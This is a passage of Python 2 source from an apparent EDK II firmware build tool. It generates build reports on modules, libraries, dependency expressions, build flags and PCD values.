SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
if int(str(M.AutoGenVersion), 0) >= 0x00010005:
self._EdkIIModule = True
else:
self._EdkIIModule = False
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
#
# Report library class, library constructor and destructor for
# EDKII style module.
#
if self._EdkIIModule:
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionList.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, "%s" % self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, "%s" % self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception, X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
DscDefaultValue = self.FdfPcdSet.get((Pcd.TokenCName, Key), DscDefaultValue)
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression, DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefault, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
Pcd.DefaultValue = PcdValue
if InfDefault == "":
InfDefault = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.gStructurePcd[self.Arch]):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = OverrideValues.keys()
Data = OverrideValues[Keys[0]]
Struct = Data.values()[0]
DscOverride = self.ParseStruct(Struct)
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
